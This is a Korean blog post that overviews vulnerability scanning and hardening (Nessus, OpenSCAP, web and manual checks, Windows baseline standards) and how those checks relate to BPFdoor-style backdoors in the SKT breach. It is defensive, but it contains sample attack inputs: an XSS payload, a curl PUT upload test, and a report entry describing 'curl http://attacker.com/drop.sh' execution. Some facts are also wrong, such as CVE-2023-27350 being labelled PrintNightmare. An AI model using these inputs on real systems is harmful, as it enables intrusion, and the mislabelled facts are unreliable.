본문 바로가기
IT 정보

[2025 최신] Nessus 취약점 스캔 방법과 보고서 예시 정리, SKT보안사고 탐지

by 망고노트 2025. 6. 18.
728x90
반응형

“Nessus Scan”은 네트워크 및 시스템의 보안 취약점을 탐지하기 위해 널리 사용되는 취약점 스캐너(Vulnerability Scanner) 중 하나입니다. 아래에 Nessus 스캔의 주요 개념, 구성 방법, 보고서 해석법까지 요약해드릴게요.

🛡️ Nessus Scan 개요

항목 설명
🔍 도구명 Nessus (by Tenable)
🧭 기능 시스템 및 네트워크의 보안 취약점 스캐닝
🎯 목적 CVE 취약점 탐지, 잘못된 구성, 백도어, 취약한 서비스 등 자동 탐지
🧑‍💻 대상 서버, 네트워크 장비, OS, 애플리케이션 등
 

🧪 스캔 유형

스캔 종류 설명
Basic Network Scan 일반적인 포트/서비스/취약점 검사
Advanced Scan 사용자 지정 포트, 플러그인, 인증 기반 검사
Web Application Tests 웹 취약점(XSS, SQLi 등) 전용 검사
Credentialed Scan 시스템 내부 권한으로 수행하는 상세 검사 (SSH, SMB 등 로그인 기반)
Malware Scan 악성코드 및 백도어 탐지 중심 검사
 

⚙️ Nessus 스캔 구성 절차

  1. 타겟 설정: IP, CIDR, 도메인 등 입력
  2. 스캔 정책 선택: Basic, Advanced, Web 등
  3. 인증 정보 입력(선택): SSH, Windows 계정 등
  4. 플러그인 필터링: 원하는 취약점만 골라 검사
  5. 스케줄링: 일회성 or 반복 스케줄 설정
  6. 스캔 실행: 스캔 시작 후 진행 상태 모니터링
  7. 보고서 확인: HTML, CSV, PDF 등으로 결과 분석

📄 스캔 결과 보고서 항목

항목 설명
Severity 취약점 위험도 (Critical / High / Medium / Low / Info)
CVE ID 공개된 취약점 번호 (e.g., CVE-2023-xxxxx)
Plugin ID Nessus 내 고유 플러그인 번호
Affected Hosts 취약점이 발견된 대상
Remediation 권장 조치 내용
Exploit Available 익스플로잇 코드 존재 여부 표시 (있으면 긴급 조치 필요)
 

🧩 보고서 활용 방법

  • ✅ 위험도별 우선 조치 (Critical → High 우선)
  • 🧪 CVE 연동된 취약점은 최신 패치 검토
  • 🔑 Credentialed Scan 실패 시 로그인 정보 확인 필요
  • 🔄 반복 스케줄 설정으로 정기 진단 가능

💡 실무 팁

  • Nessus 무료 버전은 **“Nessus Essentials”**로 16 IP까지 제한
  • Tenable.sc, Tenable.io와 연동하면 조직 전체 자산 관리 가능
  • 취약점 자동화 조치 시스템(SOAR, SIEM 등)과 연계도 가능

 Nessus 보고서 샘플 예시  관련하여, 실무에서 사용되는 취약점 진단 보고서 형식의 예시를 아래에 구성해드릴게요.

🧾 Nessus 취약점 스캔 보고서 (샘플 요약)

📌 스캔 개요

항목 내용
스캔 이름 Web Server Vulnerability Scan
스캔 날짜 2025-06-18
스캔 도구 Tenable Nessus Professional
대상 자산 192.168.1.10 (Apache 웹서버), 192.168.1.20 (Windows Server)
인증 여부 Credentialed Scan (Windows/SSH)
플러그인 활성 CVE, Misconfigurations, Malware Detection 포함
 

🚨 주요 취약점 요약

위험도 개수 대표 항목
🔴 Critical 2 CVE-2023-27350 (PrintNightmare), Apache Remote Code Exec
🟠 High 4 OpenSSL DoS, SMB Signing 미사용
🟡 Medium 6 FTP Anonymous Login, DNS Zone Transfer 가능
🔵 Low 9 ICMP Timestamp 응답, Server Banner 노출
⚪ Info 12 호스트 운영체제 정보 수집됨 등
 

🔍 주요 취약점 상세

🔴 CVE-2023-27350 - Windows Print Spooler RCE

  • 위험도: Critical
  • 설명: 원격 코드 실행이 가능한 PrintNightmare 취약점
  • 영향 대상: 192.168.1.20
  • 해결 방법: 최신 Windows 보안 패치 적용 (KB5004945)

🟠 Apache 2.4.49 - Path Traversal

  • 위험도: High
  • 설명: 인증 없이 파일 경로 노출 가능
  • 영향 대상: 192.168.1.10
  • 조치 권고: Apache 2.4.51 이상으로 업그레이드

🛠 권장 조치 요약

조치 항목 대상 IP 우선순위
Windows 서버 패치 적용 192.168.1.20 🔴 High
Apache 버전 업데이트 192.168.1.10 🔴 High
FTP 서비스 종료 192.168.1.15 🟡 Medium
SMB Signing 설정 적용 전체 Windows 서버 🟠 High
 

 “SCAP Scan”은 보안 감사나 취약점 평가에서 자주 사용되는 개념인데요, 정확한 이름은 SCAP (Security Content Automation Protocol) 스캔입니다.

아래에 SCAP 스캔의 개념, 구성 방식, 도구, 결과 해석법까지 체계적으로 정리해드릴게요.

🔐 SCAP Scan이란?

항목 내용
전체 이름 Security Content Automation Protocol
주관 기관 미국 NIST (National Institute of Standards and Technology)
핵심 목적 자동화된 보안 설정 점검, 취약점 진단, 정책 준수 감사
적용 대상 OS, 네트워크 장비, 애플리케이션 등
주요 사용처 보안 컴플라이언스 준수 확인 (예: FISMA, CIS Benchmarks)
 

🧰 SCAP 스캔에 사용되는 주요 구성 요소

구성 요소 설명
XCCDF (Extensible Configuration Checklist Description Format) 보안 설정 점검 기준 정의
OVAL (Open Vulnerability and Assessment Language) 취약점 정의 및 시스템 상태 확인
CCE (Common Configuration Enumeration) 보안 설정 항목에 대한 고유 식별자
CVE 공개된 취약점 고유 번호
CPE 제품 식별자 (운영체제, 앱 등)
CVSS 취약점 심각도 점수화 체계
 

⚙️ SCAP 스캔 도구 (대표적인 것들)

도구 특징
OpenSCAP 오픈소스 SCAP 평가 도구, 리눅스에 최적화
SCAP Workbench GUI 기반 OpenSCAP 인터페이스
Tenable.sc Nessus와 연동 가능, SCAP feed 지원
Qualys 정책 준수 기반 SCAP 모듈 제공
McAfee ePO, Tripwire, Red Hat Satellite 등도 SCAP 지원 가능  
 

📊 SCAP 스캔 결과 예시

항목 내용
✅ Passed 설정이 정책에 부합함 (예: 패스워드 복잡성 기준 만족)
❌ Failed 정책 위반 항목 (예: 방화벽 비활성화 상태)
⚠️ Not Checked 일부 항목은 확인 불가 (예: 권한 부족)
📄 Output 해당 항목의 실제 시스템 설정 상태 확인 가능
🛠 Remediation 수정 가이드 포함 (스크립트 형태로 제공되기도 함)
 

🛠 SCAP 스캔의 실무 활용 예시

  • Red Hat 계열 서버의 CIS Benchmark 준수 여부 점검
  • 공공기관의 FISMA/ISMS 컴플라이언스 감사
  • 운영팀이 자동화로 보안 설정 상태 점검
  • 관리자 권한 없이 정책 위반 항목만 자동 보고서 제출

아래는 요청하신 SCAP 보고서 샘플, OpenSCAP CLI 결과 예시, 수정 스크립트 예제를 HTML 형식으로 정리한 내용입니다.

🔽 실무에서 활용 가능한 리포트 형식입니다. 필요하시면 PDF/HTML 파일로도 저장해드릴 수 있습니다.

아래는 세 가지 모두를 정리한 SCAP 스캔 예시 결과 요약입니다:

🔐 1. SCAP 보고서 요약 (샘플)

점검 항목 결과 현재 상태 권장 조치
패스워드 최소 길이 ✅ Passed 12자 이상 -
root 계정 원격 로그인 차단 ❌ Failed PermitRootLogin yes sshd_config에서 PermitRootLogin no로 수정
방화벽 활성화 ❌ Failed firewalld 비활성 systemctl enable --now firewalld
SSH 포트 변경 ⚠️ Not Checked 기본값(22) 변경 권고 (예: 2222)
 

⚙️ 2. OpenSCAP CLI 실행 예시

$ oscap xccdf eval --profile xccdf_org.ssgproject.content_profile_cis \
  --results scan-results.xml \
  --report scan-report.html \
  /usr/share/xml/scap/ssg/content/ssg-centos9-ds.xml

Evaluation done.
Report saved to: scan-report.html  
Results saved to: scan-results.xml

🛠 3. Remediation Script (수정 스크립트 예시)

#!/bin/bash
# 패스워드 최소 길이 설정
sed -i 's/^PASS_MIN_LEN.*/PASS_MIN_LEN 12/' /etc/login.defs

# root 원격 로그인 차단
sed -i 's/^PermitRootLogin.*/PermitRootLogin no/' /etc/ssh/sshd_config
systemctl restart sshd

# 방화벽 활성화
systemctl enable --now firewalld

웹 사이트의 보안 취약점을 점검하려면 다음과 같은 웹 취약점(Web Vulnerability) 스캔 도구체크 항목을 활용하면 됩니다. 아래에 체크 대상, 주요 도구, 실무 예시까지 정리해드릴게요.

🛡️ Web Vulnerabilities Check: 개요

항목 설명
✅ 점검 대상 웹 애플리케이션, 웹 서버, API, 프런트엔드/백엔드 간 인터페이스 등
🔍 점검 목적 XSS, SQL Injection, CSRF, RCE, 인증 우회, 서버 설정 미비 등 탐지
📋 방법 자동화 스캐너 + 수동 점검 (소스 코드/동작 분석) 병행 권장
 

📋 주요 취약점 항목 (OWASP Top 10 기준)

취약점 유형 설명
A01 - Broken Access Control 인증 우회, 권한 없는 자원 접근 가능 여부
A02 - Cryptographic Failures HTTPS 미사용, 암호화 미비
A03 - Injection (SQL/XSS) 입력값 필터링 미비로 코드 삽입 가능
A05 - Security Misconfiguration 디버그 모드 노출, 에러 메시지 노출 등
A07 - Identification and Authentication Failures 인증 우회, 약한 패스워드 정책
A08 - Software and Data Integrity Failures CDN 스크립트 검증 누락 등
A09 - Security Logging and Monitoring Failures 이상 행동 탐지 불가, 로그 미저장
 

🧰 추천 도구

도구명 특징 설치 방식
OWASP ZAP 무료, 널리 사용되는 웹 취약점 자동 스캐너 로컬 앱
Burp Suite (Community/Pro) 프록시 기반 수동 분석 + 자동 스캐닝 로컬 앱
Nikto Apache/Nginx 구성 취약점 탐지 CLI
Nessus 종합 취약점 진단 + 웹 스캐닝 플러그인 지원 설치형
Nmap + NSE HTTP 관련 NSE 스크립트로 취약점 추적 CLI
Acunetix / Qualys WAS 기업용, 자동화된 고급 웹 앱 분석 상용 웹 도구
 

⚙️ 실무 점검 예시 (ZAP 기준)

1. ZAP 실행 → 웹사이트 주소 입력 (예: https://testsite.com)
2. "Automated Scan" 클릭 → 크롤링 및 스캐닝 자동 진행
3. 결과에서 발견된 취약점 리스트 확인 (XSS, SQLi 등)
4. 각 항목 클릭 → 설명, 영향, 조치 방안 확인 가능
5. 보고서 생성: HTML/PDF로 저장

📄 웹 취약점 보고서 구성 예시

항목 설명
취약점 이름 Stored Cross-Site Scripting (XSS)
발견 URL https://example.com/comment
심각도 High
설명 악성 스크립트가 저장되어 다른 사용자에게 실행됨
재현 절차 입력창에 <script>alert(1)</script> 삽입
조치 방안 출력 시 HTML escape 처리 적용, CSP 헤더 추가
 

 

 

수동 웹 취약점 점검(Manual Web Vulnerabilities Check)은 자동화 도구(ZAP, Nessus 등)로 탐지되지 않는 논리적, 컨텍스트 기반, 비정형 취약점을 파악하기 위한 필수적인 보안 점검 방식입니다. 아래에 체크 항목, 방법론, 도구, 실제 예시까지 체계적으로 정리해드릴게요.

🛡️ Manual Web Vulnerability Check란?

항목 설명
목적 자동 스캐너로는 놓칠 수 있는 복합 취약점 분석
방식 개발자/보안 전문가가 직접 웹사이트의 동작 흐름을 분석하고 취약점을 수작업으로 테스트
주요 장점 컨텍스트 기반 취약점, 인증 우회, 비정형 로직 오류 등 탐지 가능
사용 툴 브라우저 + Burp Suite + HTTP Repeater + DevTools 등
 

📋 주요 수동 점검 항목

항목 테스트 내용
🔐 인증 우회 (Auth Bypass) 로그인/세션 토큰 위변조, 접근 권한 조작
🧭 수직/수평 권한 상승 /user/1 → /user/2 접근 시도
🧼 입력 검증 부족 XSS, SQLi 직접 삽입 후 응답 확인
📤 CSRF 우회 CSRF 토큰 없는 POST 요청 직접 보내기
🧾 민감 정보 노출 Robots.txt, Debug 메시지, 백업 파일 (.bak)
🧩 비정상 HTTP 메서드 허용 OPTIONS, PUT, DELETE 요청 확인
🔁 API 인증/권한 점검 API 요청에 토큰 생략하거나 다른 사용자 ID 전달
🧪 Business Logic 오류 가격 조작, 수량 우회, 포인트 시스템 조작 등
⏳ Rate Limit 우회 Brute-force, OTP 인증 반복 시도 등
📂 디렉터리 인덱싱/리스트 허용 /uploads/, /backup/ 등 접근 시 리스트 노출 여부 확인
 

🧰 수동 점검에 사용되는 도구

도구 용도
Burp Suite (Community/Pro) HTTP 프록시, Repeater, Intruder 등
Postman API 요청 조작
브라우저 DevTools 요청/응답 헤더 확인, 자바스크립트 분석
F12 콘솔 JS 취약점, 클라이언트 기반 인증 로직 분석
Curl/Wget 커맨드라인 기반 요청 조작
JWT Debugger 토큰 변조 테스트
HackBar (Firefox 플러그인) XSS/SQLi 입력값 삽입 도우미
 

🛠 수동 점검 실전 예시

✅ 인증 우회 점검

  1. 로그인 후 발급된 sessionid, JWT 등을 캡처
  2. 로그아웃 후 동일 쿠키로 다시 접근 → 성공 시 인증 우회 가능성

✅ IDOR (수평 권한 상승) 점검

  1. URL 예시: GET /user/profile?id=1002
  2. 로그인한 계정의 ID가 1001인데 1002로 요청 → 타인 정보 노출 여부 확인

✅ Business Logic 오류

  1. 장바구니 수량 = -1 입력 → 결제 금액 감소 시도
  2. 할인 쿠폰 중복 적용 → 정상 동작 여부 확인

✅ HTTP Method 테스트

 

curl -X PUT https://example.com/test.txt -d "hacked"

 

→ 200 OK 응답 시 미인가 파일 업로드 취약점

📄 보고서 항목 예시

항목 내용
취약점 명 인증 우회
테스트 URL /admin/dashboard
테스트 내용 비인증 사용자도 세션 없이 접근 가능
실제 결과 HTTP 200 OK, 관리자 화면 노출
심각도 High
권장 조치 인증 미통과 시 접근 차단 로직 추가
 

📌 수동 점검은 언제 필요할까?

  • 보안 감사를 위한 심층 점검
  • 자동 도구에서 탐지되지 않는 문제 확인
  • API 백엔드, 권한체계, 복잡한 결제 로직 검증
  • 버그바운티 참여자, 화이트해커, 보안 담당자 필수 역량

다음은 요청하신 Manual Web Vulnerability Check 3가지 구성요소입니다:

✅ 1. 수동 점검 체크리스트

  • 인증 우회
  • IDOR(수평 권한 상승)
  • CSRF 우회
  • XSS
  • 디렉터리 노출

✅ 2. 수동 진단 보고서 샘플

취약점 결과 심각도
인증 우회 로그인 없이 관리자 화면 접근됨 🔴 High
IDOR 다른 사용자 데이터 노출 🟠 Medium
XSS <script> 실행됨 🟠 Medium
 

✅ 3. Burp Suite Repeater 요청 예시

POST /api/update_profile HTTP/1.1
Host: example.com
Cookie: session=abc123
Content-Type: application/json

{
  "name": "<script>alert(1)</script>"
}

 

"MBSS"는 일반적으로 다음 중 하나를 의미할 수 있습니다:

  1. Microsoft Baseline Security Scanner 또는
  2. Mobile Banking Security Scan (보안 컨설팅에서 종종 사용되는 약어)

사용자의 의도에 따라 다르겠지만, 대부분 MBSA (Microsoft Baseline Security Analyzer) 또는 그 후속 개념을 지칭하는 것으로 판단됩니다. 이에 기반해 **Microsoft 시스템 보안 점검(MBSS 스타일)**에 대한 내용을 아래에 정리해드립니다.

🖥️ MBSS (Microsoft Baseline Security Scan) 개요

항목 설명
목적 Windows 시스템 및 서비스의 보안 설정 상태 점검
사용 대상 Windows Server, Windows 10/11, IIS, SQL Server 등
관련 도구 ✔️ MBSA (구버전)
✔️ Security Compliance Toolkit (SCT)
✔️ Windows Defender ATP, GPO, PowerShell
 

🔍 주요 점검 항목

항목 설명
패치 상태 최신 보안 업데이트 적용 여부
비밀번호 정책 복잡성, 최소 길이, 만료 주기 등
로컬 사용자 계정 불필요한 계정, 관리자 계정 상태
서비스 및 포트 불필요한 서비스/포트 실행 여부
방화벽 설정 인바운드 규칙 상태, 예외 규정
파일 공유 설정 공용 공유 디렉터리 오픈 여부
원격 데스크탑 RDP 비활성화 여부, TLS 적용 여부
자동 실행 Autorun 기능 활성화 여부
레지스트리 정책 보안 그룹 정책 적용 여부 확인
 

⚙️ 도구별 스캔 방법

🔧 1. MBSA (구버전 – 더 이상 공식 지원되지 않음)

mbsa.exe /n os+sql+iis+password /xmlout report.xml

🔧 2. PowerShell 기반 스크립트 예시

# 패치 누락 확인
Get-WindowsUpdateLog
Get-HotFix

# 계정 정책 확인
Get-LocalUser
(Get-LocalUser -Name "Administrator").Enabled

🔧 3. Security Compliance Toolkit (SCT)

  • Microsoft 제공 GPO 템플릿 기반 점검 가능
  • Windows 11, Server 2022 대응

📄 보고서 항목 예시

항목 점검 내용 결과 조치 권고
Windows Update 보안 패치 4건 미적용 누락된 KB 패치 적용 필요
관리자 계정 이름 기본값(Admin) ⚠️ 계정 이름 변경 권고
RDP 설정 인증 없음 + 포트 개방 RDP 인증 및 IP 제한 설정
방화벽 규칙 외부 445 포트 허용 SMB 포트 차단
 

"Minimum Baseline Security Standard (MBSS)"는 모든 시스템, 서버, 애플리케이션이 기본적으로 따라야 할 최소 보안 기준을 의미합니다. 이는 보안 수준을 표준화하고, 취약한 설정을 사전에 방지하며, 컴플라이언스 준수 기반을 마련하는 데 필수적입니다.

아래에 MBSS의 핵심 구성, 항목별 기준, 실무 적용 예시, 보고서 템플릿까지 전체적으로 정리해드립니다.

✅ Minimum Baseline Security Standard (MBSS) 개요

항목 설명
🎯 목적 모든 IT 자산의 최소 보안 수준 표준화
📦 적용 대상 OS, 서버, 네트워크 장비, DB, 클라이언트, 클라우드 등
📋 관리 방식 정책 기반 관리 (GPO, MDM, Configuration Management 등)
📄 문서화 체크리스트 기반 진단표 or 정책 문서로 배포
 

🧱 MBSS 핵심 구성 항목 (범용 시스템 기준)

영역 항목 최소 기준 예시
✅ OS 보안 최신 보안 패치 적용 30일 이내 적용
✅ 계정/인증 기본 계정 비활성화, MFA 적용 관리자 외 모든 계정 최소 권한
✅ 암호 정책 복잡성, 12자 이상, 90일 변경 주기 실패 5회 → 계정 잠금
✅ 로그 및 모니터링 이벤트 로그 수집, 보존 90일 이상 외부 Syslog 서버 연동 권장
✅ 방화벽 불필요한 포트/프로토콜 차단 22, 3389, 445 등 제한
✅ 서비스 설정 자동 실행 서비스 최소화 Telnet, FTP, SNMP 비활성화
✅ 원격 접속 RDP, SSH는 VPN 통과 시만 허용 IP 화이트리스트 적용
✅ 파일 공유/퍼미션 공유 디렉토리 제한 Everyone 권한 금지
✅ 백신/EDR 실시간 보호 및 자동 업데이트 설정 일일 스캔 주기 적용
✅ 암호화 저장/전송 데이터 모두 암호화 TLS 1.2 이상, SMBv1 금지
 

🛠 실무 적용 예시 (Windows Server 2022)

항목 설정 위치 기준값
패스워드 복잡성 GPO > Account Policies Enabled
로그인 실패 잠금 Local Security Policy > Lockout 5회 실패, 15분 잠금
원격 데스크탑 System Settings > Remote 비활성화 또는 MFA 적용
Windows Defender Windows Security Center 실시간 감시 + 클라우드 보호
자동 업데이트 Windows Update 자동 설치 (주간 기준)
 

📄 MBSS 점검 체크리스트 예시

항목 점검 기준 결과 조치
패스워드 길이 12자 이상 -
기본 계정 비활성화 guest 계정 비활성 net user guest /active:no 실행
SMBv1 비활성화 사용 금지 ⚠️ Set-SmbServerConfiguration -EnableSMB1Protocol $false
관리자 계정명 변경 admin → 변경 필요 로컬 보안 정책에서 설정
 

SKT(또는 유사한 대기업)의 보안 이슈 사례인 BPFdoor 감염, APT 공격, 내부 시스템 우회 통신 등의 위협이 언급되었을 때, 지금까지 다룬 MBSS, SCAP, Nessus, Manual Check, Web Scan들이 이런 고급 위협을 얼마나 탐지할 수 있는지를 아래와 같이 정리해 드리겠습니다.

🎯 목표: SKT 보안 사고와 같은 BPFdoor, 내부 우회형 악성코드 탐지 가능 여부

점검 방식 BPFdoor 탐지 가능성 설명
MBSS (Minimum Baseline Security Standard) 🔸 낮음 (간접 가능) 프로세스 실행, 비정상 포트, 서비스 비활성화 기준 등으로 정책상 예방은 가능하나 탐지는 어려움
SCAP Scan 🔸 낮음 보안 구성 이상 여부만 체크. 멀웨어 탐지 X, 다만 SMB/RDP 설정 등 잘못된 설정은 사전 점검 가능
Nessus Scan 🔸 중간 가능 알려진 백도어/원격쉘 패턴이 있는 경우에만 탐지 가능. BPFdoor는 알려진 CVE 기반이 아니므로 기본 Nessus 플러그인으로는 대부분 놓침
Manual Vulnerability Check 🔸 낮음~중간 프로세스/포트 상태 이상 탐지는 가능. 단, 수작업으로 lsof, netstat, ps aux, auditd 확인 필요
Web Vulnerability Scan ❌ 불가능 BPFdoor는 웹이 아니라 시스템 내부 백도어 기반으로 웹 점검과 무관
EDR / NDR / HIDS (별도 보안 솔루션) ✅ 매우 높음 BPFdoor의 비정상적인 프로세스/패킷 조작, raw socket 활동, 포트리스 통신은 EDR에서 탐지 가능
Forensic + Behavior Analysis ✅ 필요 메모리 포렌식, 네트워크 트래픽 분석, Sysmon 로그 추적 등 필요
 

🧪 BPFdoor 간단 개요

항목 설명
악성코드 명 BPFdoor (Backdoor over Berkeley Packet Filter)
특징 포트리스 통신 (열린 포트 없이 원격 제어 가능), rootkit 방식 은폐, 신호 기반 활성화
작동 방식 시스템에 숨겨진 프로세스로 설치 → ICMP/UDP로 신호 수신 → 셸 오픈
탐지 우회 방화벽 우회, 포트리스, 패킷 필터 우회, 로그 미기록
 

🔍 실무 대응 방안 요약

탐지 방식 도구 예시 역할
🔍 프로세스/포트 모니터링 netstat, lsof, ss -nlp, ps -ef 수상한 백그라운드 프로세스 식별
🧠 행동기반 탐지 EDR (CrowdStrike, SentinelOne, 윈도우 Defender ATP) 정상/비정상 실행 패턴 구분
📦 패킷 분석 Wireshark, Zeek, Suricata, tcpdump 비정상 패킷/신호 통신 포착
📁 파일 분석 VirusTotal, yara, strings 분석 libdl.so 같은 위장된 이름 식별
📋 Sysmon + SIEM sysmon logs + ELK/Splunk ProcessCreate + NetworkConnect 연계 분석
 

✅ 결론

  • MBSS / SCAP / Nessus / Manual 점검만으로는 BPFdoor 같은 고도화된 백도어 탐지 한계 있음
  • BPFdoor는 기존 CVE 기반이 아닌 행위 기반 위협
  • EDR, 포렌식, Sysmon 기반 탐지 로직 추가 구성이 반드시 필요

SKT 침해 사례처럼 고도화된 공격에 사용된 웸셀(WemSell), BPFdoor, 웹쉘(WebShell), 포트리스 백도어, APT 그룹 도구, SSH 터널링 등 다양한 공격 도구들을 모두 커버할 수 있는 단일 점검 체계 또는 보고서 포맷을 구성할 수 있습니다.
다만, 기존의 MBSS, SCAP, Nessus 등만으로는 충분하지 않으며, 추가적인 고급 탐지 체계와 행위 기반 분석 도구가 필요합니다.

✅ 통합 점검 범위: SKT 침해 사고 대응 가능 영역

공격 요소 설명 포함 가능 여부
BPFdoor 포트리스 백도어, raw socket, 패킷 감지 우회 🔸 수동 포렌식/EDR/Sysmon
웹쉘(WebShell) JSP, PHP, ASP 백도어 ✅ Web Scan + Manual 점검
웸셀(WemSell) 워드프레스/블로그용 한국형 웹쉘 (파일 업로드 후 php backdoor 실행) ✅ Web Upload 검증 + Signature 탐지
SSH Tunneling 내부망 데이터 외부 전송 🔸 Flow 분석 + NDR 필요
익스플로잇 킷/드롭퍼 파일 다운로드 후 후속 악성 행위 (EXE, DLL, Powershell) 🔸 EDR 또는 Sysmon 기반 로깅 필요
C2 Beacon 원격 명령 제어용 비정상 통신 🔸 NDR/PCAP 기반 이상 트래픽 분석
APT 그룹 도구 Lazarus, APT37 등에서 사용되는 자체 제작 툴 🔸 IOC 기반 + 행위기반 분석 필요
 

🛡️ 이를 커버할 수 있는 통합 점검 체계 구성안

계층 도구 예시 커버 대상
표준 구성 점검 MBSS, SCAP, CIS Benchmarks 정책 미비, SMB/FTP/암호 정책 등
자동 취약점 진단 Nessus, OpenVAS 웹 취약점, 시스템 CVE 기반
웹쉘 탐지 Webshell signature scan, 웹 루트 hash 비교 WemSell, .php/.jsp 백도어 등
수동 점검/포렌식 ps, netstat, ss, file, strings, chkrootkit BPFdoor 등 백도어 활동 포착
Sysmon + SIEM 분석 Sysmon + ELK/Splunk 실행 트리, 네트워크 접속 로그 분석
EDR 솔루션 SentinelOne, CrowdStrike, Defender ATP 실시간 이상행위, 메모리 기반 백도어
NDR + 트래픽 분석 Zeek, Suricata, PCAP 분석 비정상 Beacon/C2 통신, SSH 터널 감지
 

📄 보고서 구성 예시 (All-in-One)

항목 내용 탐지 방법 대응
웹쉘 업로드 흔적 /upload/wemsell.php 발견 웹루트 정합성 체크, hash diff 즉시 삭제 및 웹 로그 보존
포트리스 백도어 PID 없이 0.0.0.0 바인딩 프로세스 ss -nlp, ps -ef kill + 메모리 덤프
C2 통신 주기적 DNS beacon (every 60s) Suricata + Zeek rule IP 차단 + PCAP 증거 확보
악성 파일 다운 curl http://attacker.com/drop.sh 실행 흔적 Sysmon/PowerShell 기록 디스크 이미지 증거 보관
 

✅ 결론: “모든 사례를 담는 통합 점검” 가능 여부

  • 가능합니다. 단, 기본 점검(MBSS, Nessus) 외에 아래를 반드시 포함해야 함:
    1. WebShell 시그니처 및 업로드 점검 (웸셀 탐지 포함)
    2. Sysmon 기반의 실행/네트워크 이력 로깅
    3. EDR/PCAP 기반의 실시간 이상행위 분석
    4. Manual 포렌식 도구로 BPFdoor같은 은폐형 프로세스 추적

 

 

이 글이 도움이 되셨다면
🔔 구독❤️ 좋아요  꾸우욱 눌러 주세요!🙏

그리고 💖커피 ☕, 💚차 🍵, 💛맥주 🍺, ❤️와인 🍷  중 마음에 드시는 한 잔으로 💰 후원해 주시면 큰 힘이 됩니다.

                                                                             👇 지금 바로 아래 🔘버튼을 꾸욱 눌러 📣 응원해 주세요! 👇  

728x90
반응형

'IT 정보' 카테고리의 다른 글

CVE 탐지 실무 가이드 (2025)  (3) 2025.06.19
Tenable Nessus 보안 점검 가이드  (1) 2025.06.19
Frequentis,LMR-IWF/GW  (0) 2025.06.16
Zetron,미국 미션 크리티컬 통신 시스템 전문 기업  (0) 2025.06.13
UE AMBR vs APN AMBR 비교표,5G QOS(품질) 비교  (5) 2025.06.12

 

이 글이 도움이 되셨다면
🔔 구독❤️ 좋아요 꾸우욱 눌러 주세요!🙏

그리고 💖커피 ☕, 💚차 🍵, 💛맥주 🍺, ❤️와인 🍷 중 마음에 드시는 한 잔으로 💰 후원해 주시면 큰 힘이 됩니다.

👇 지금 바로 아래 🔘버튼을 꾸욱 눌러 📣 응원해 주세요! 👇

관련글

티스토리툴바